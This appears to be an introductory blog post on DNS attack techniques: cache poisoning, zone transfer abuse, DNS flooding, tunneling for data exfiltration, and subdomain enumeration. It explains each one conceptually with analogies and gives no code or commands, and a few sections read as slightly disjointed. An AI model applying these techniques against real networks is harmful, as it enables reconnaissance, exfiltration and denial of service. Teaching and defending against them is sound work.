The DNS Verse – Techniques of DNS Hacking

How It Works:

1. Storing DNS Information:
   • When you visit a website, your DNS server saves the website’s address in its cache. This means the next time someone requests that website, the DNS server can quickly provide the address without repeating the lengthy lookup process.
2. Malicious Exploitation:
   • Attackers can insert fake or malicious records into this cache. This could redirect users to fake websites instead of the legitimate ones they intended to visit.

Why It Works:

Exploitation Opportunity: Since cached information is used for quicker access, attackers can exploit this by placing harmful data into the cache, misleading users without immediately triggering suspicion.

Faster Lookup: Caching speeds up DNS lookups because the server doesn’t need to recheck the entire internet.

Imagine, your friend took your phone and without getting noticed, he/she changed the phone number of your contact list to another valid phone number, and now when you call to that specific contact name, it rings but to wrong person. That’s DNS Cache Poisoning in a nutshell.

Let’s get this in.

A DNS zone transfer is a process used to copy DNS information from one nameserver to another. This helps keep backup nameservers updated with the most current information.

Example:

1. Primary and Secondary Phone Books:
   • Primary Phone Book (Primary Nameserver): This is your main, up-to-date phone book that has all the latest contact details.
   • Secondary Phone Book (Secondary Nameserver): This is a backup phone book that you want to keep the same as the primary one.
2. Zone Transfer:
   • Imagine you want to make sure the secondary phone book always has the latest updates. To do this, you use a process called a zone transfer.
   • A zone transfer is like taking the latest version of the primary phone book and copying it to the secondary phone book.
3. How It Works:
   • Primary Phone Book: This phone book is where all the updates and changes are made.
   • Zone Transfer Process: Periodically, or whenever there is a change, the details from the primary phone book are copied over to the secondary phone book. This ensures that the secondary phone book has the same information as the primary one.

There are two mechanisms in DNS system that are used to perform zone transfer.

A DNS zone transfer can be compared to a detailed map of an organization’s online setup. If attackers get hold of this map, they can see a lot of useful information about the organization’s network.

If attackers use a DNS zone transfer, they can get a comprehensive map of an organization’s network, including subdomains, mail servers, IP addresses, and naming details. This information can help them plan further attacks.

Imagine you have a library with a librarian who helps people find books. The librarian (DNS server) answers requests from people asking for specific book locations (domain names).

A DNS flooding attack is like a situation where someone starts sending an overwhelming number of fake book requests to the librarian all at once. The librarian is so busy trying to handle these fake requests that they can’t help real people who come to the library.

Example:

As a result, it can’t respond to legitimate requests from real users, causing a denial of service for the users trying to visit real websites.

Normal Scenario:

You want to visit a website, say example.com.

Your computer sends a request to a DNS server to find out the address of example.com.

The DNS server looks up the address and sends it back to your computer, allowing you to visit the site.

During a DNS Flooding Attack:

Attackers use many computers (often part of a botnet) to send an enormous number of fake DNS requests to the DNS server.

These requests are like constant and meaningless queries asking about random or non-existent websites.

The DNS server gets overwhelmed trying to handle all these requests.

What It Is: DNS tunneling is a method used to secretly send data out of a network by hiding it in DNS queries and responses.

How It Works:

1. Normal DNS Use:
   • You ask a DNS server for the address of a website (e.g., example.com).
   • The server replies with the IP address, and you visit the site.
2. In DNS Tunneling:
   • Attacker’s Setup: An attacker with access to a compromised computer inside a network wants to steal data.
   • Data Hiding: The attacker hides stolen data within DNS queries, disguised as regular requests (e.g., data.hiddenserver.com).
   • Sending Data: These disguised queries are sent to an external server controlled by the attacker.
   • Receiving Data: The remote server extracts the hidden data and responds using DNS traffic, which the firewall allows.

Why It Works:

DNS traffic is usually permitted by firewalls, allowing the hidden data to escape unnoticed.

Domain enumeration is the process of finding subdomains under a main domain, like discovering subdomain.example.com under example.com. This is useful for identifying hidden services and potential vulnerabilities. It works through several methods: querying DNS servers for full records (DNS Zone Transfer), checking common subdomains (DNS Queries), guessing subdomains using wordlists (Brute Forcing), searching public records and search engines (like crt.sh and Censys), and accessing third-party databases that track subdomains (such as SecurityTrails and Shodan). It’s effective due to DNS’s hierarchical nature, potential server misconfigurations, available public records, predictable subdomain names, and historical data in external databases. Domain enumeration helps uncover attack surfaces, hidden services, and provides a detailed view of the target’s infrastructure.